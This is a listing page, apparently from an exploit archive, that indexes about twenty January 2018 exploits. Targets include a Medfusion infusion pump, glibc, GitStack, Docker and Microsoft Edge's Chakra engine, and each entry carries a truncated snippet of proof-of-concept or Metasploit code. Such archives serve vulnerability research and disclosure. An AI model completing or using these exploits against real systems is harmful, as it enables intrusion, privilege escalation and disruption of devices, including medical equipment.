Smiths Medical Medfusion 4000 - 'DHCP' Denial of Service
  Date: 2018-01-19 15:13:42 Views: 0 Comments: 0
#!/usr/bin/python3 PoC for MQX RTCS code execution via DHCP options overflow. This is just a quick hack to prove the vulnerability and was designed to run on a private network with the target device. import datetime import socket def main(): Use a de
glibc - 'getcwd()' Local Privilege Escalation
  Date: 2018-01-19 15:10:53 Views: 0 Comments: 0
/** This software is provided by the copyright owner as is and any * expressed or implied warranties, including, but not limited to, * the implied warranties of merchantability and fitness for a particular * purpose are disclaimed. In no event shall
Primefaces 5.x - Remote Code Execution (Metasploit)
  Date: 2018-01-19 15:08:58 Views: 0 Comments: 0
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::
GitStack 2.3.10 Remote Code Execution
  Date: 2018-01-19 15:08:11 Views: 0 Comments: 0
# Exploit: GitStack 2.3.10 Unauthenticated Remote Code Execution # Date: 18.01.2018 # Software Link: https://gitstack.com/ # Exploit Author: Kacper Szurek # Contact: https://twitter.com/KacperSzurek # Website: https://security.szurek.pl/ # Category: remot
Docker Sudo Privilege Escalation
  Date: 2018-01-18 15:43:36 Views: 3 Comments: 0
#!/bin/bash # SUDO Docker Privilege Escalation # https://github.com/pyperanger/dockerevil # SELINUX bypass using :z option # https://docs.docker.com/engine/admin/volumes/bind-mounts/#configure-the-selinux-label echo [*] SUDO Docker Privilege Escalation;
Microsoft Edge Chakra JIT Loop Analysis Bug
  Date: 2018-01-18 15:43:10 Views: 2 Comments: 0
Microsoft Edge: Chakra: JIT: Loop analysis bug CVE-2018-0777 Here's the PoC demonstrating OOB write. function opt(arr, start, end) { for (let i = start; i < end; i++) { if (i === 10) { i += 0; // -- (a) } arr[i] = 2.3023e-320; } } function main() { let ar
Microsoft Edge Chakra JIT - Stack-to-Heap Copy
  Date: 2018-01-18 15:42:33 Views: 3 Comments: 0
/* If variables don't escape the scope, the variables can be allocated to the stack. However, there are some situations, such as when a bailout happens or accessing to arguments containing stack-allocated variables, where those variables should not e
Microsoft Edge Chakra - 'AsmJSByteCodeGenerator::EmitCall' Out-of-Bounds Read
  Date: 2018-01-18 15:41:52 Views: 2 Comments: 0
/* AsmJSByteCodeGenerator::EmitCall which is used to emit call instructions doesn't check if an array identifier is used as callee. The method handles those invalid calls in the same way it handles valid calls such as arr[idx ...](). In these cases,
Microsoft Edge Chakra JIT - Out-of-Bounds Write
  Date: 2018-01-18 15:41:07 Views: 2 Comments: 0
// Here's the PoC demonstrating OOB write. function opt(arr, start, end) { for (let i = start; i < end; i++) { if (i === 10) { i += 0; // -- (a) } arr[i] = 2.3023e-320; } } function main() { let arr = new Array(100); arr.fill(1.1); for (let i = 0; i < 1
Microsoft Edge Chakra - Deferred Parsing Makes Wrong Scopes (2)
  Date: 2018-01-18 15:40:34 Views: 3 Comments: 0
/* Since the PoC is only triggerable when the DeferParse flag enabled and requires a with statement, I think this is similar to issue 1310. PoC: */ // Enable the flag using 'n'.repeat(0x1000) eval(`(function f() { with ({}) { (function () { print(
Microsoft Edge Chakra - Incorrect Scope Handling
  Date: 2018-01-18 15:39:38 Views: 4 Comments: 0
// PoC: (function func(arg = function () { print(func); // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function. }()) { print(func); function func() { } })(); // Chakra fails to distinguish whether the functi
Microsoft Edge Chakra - 'JavascriptGeneratorFunction::GetPropertyBuiltIns' Type
  Date: 2018-01-18 15:39:04 Views: 3 Comments: 0
/* Here's a snippet of the method. bool JavascriptGeneratorFunction::GetPropertyBuiltIns(Var originalInstance, PropertyId propertyId, Var* value, PropertyValueInfo* info, ScriptContext* requestContext, BOOL* result) { if (propertyId == PropertyIds::l
Microsoft Edge Chakra JIT - Incorrect Bounds Calculation
  Date: 2018-01-18 15:38:13 Views: 3 Comments: 0
/* Let's start with comments in the GlobOpt::TrackIntSpecializedAddSubConstant method. // Track bounds for add or sub with a constant. For instance, consider (b = a + 2). The value of 'b' should track // that it is equal to (the value of 'a') + 2. Th
Seagate Personal Cloud - Multiple Vulnerabilities
  Date: 2018-01-17 14:36:37 Views: 2 Comments: 0
# SSD Advisory Seagate Personal Cloud Multiple Vulnerabilities ## Vulnerabilities summary The following advisory describes two (2) unauthenticated command injection vulnerabilities. Seagate Personal Cloud Home Media Storage is the easiest way to stor
D-Link DNS-325 ShareCenter 1.05B03 Shell Upload / Command Injection
  Date: 2018-01-16 15:38:22 Views: 14 Comments: 0
########################################################################### ,---.| | |---'|---.,---.,---.,---.|---.,---.,---.. .,---. | | || |`---.| || || || | |`---. ` ` '`---'`---'|---'` '`---'` `---'`---' | Phosphorus Cybersecurity, Inc. ########
Synology Photo Station 6.8.2-3461 - 'SYNOPHOTO_Flickr_MultiUpload' Race Conditio
  Date: 2018-01-16 15:35:28 Views: 1 Comments: 0
#!/usr/local/bin/python Synology Photo Station = 6.8.2-3461 (latest) SYNOPHOTO_Flickr_MultiUpload Race Condition File Write Remote Code Execution Vulnerability Found by: mr_me Tested: 6.8.2-3461 (latest at the time) Vendor Advisory: https://www.synol
OBS studio 20.1.3 - Local Buffer Overflow
  Date: 2018-01-16 15:34:44 Views: 3 Comments: 0
author = ''' ############################################## # Created: ScrR1pTK1dd13 # # Name: Greg Priest # # Mail: ScR1pTK1dd13.slammer@gmail.com # ############################################## # Exploit Title: OBS-Studio-20.1.3 Local Buffer Overf
Adminer 4.3.1 - Server-Side Request Forgery
  Date: 2018-01-16 15:32:31 Views: 2 Comments: 0
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ADMINER-UNAUTHENTICATED-SERVER-SIDE-REQUEST-FORGERY.txt [+] ISR: apparition security Vendor: ============== www.admine
Disk Pulse Enterprise 10.1.18 - Buffer Overflow
  Date: 2018-01-16 15:30:51 Views: 3 Comments: 0
# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - Buffer Overflow # Exploit Author: Ahmad Mahfouz # Description: Disk Pulse Enterprise Server Unauthenticated Remote Buffer Overflow SEH # Contact: http://twitter.com/eln1x # Date: 12/01/2018 # CV
SysGauge Server 3.6.18 - Buffer Overflow
  Date: 2018-01-16 15:27:10 Views: 3 Comments: 0
# Exploit Title: SysGauge Server 3.6.18 - Buffer Overflow # Exploit Author: Ahmad Mahfouz # Description: Sysgauge Server Unauthenticated Remote Buffer Overflow SEH # Contact: http://twitter.com/eln1x # Date: 12/01/2018 # CVE: CVE-2018-5359 # Version: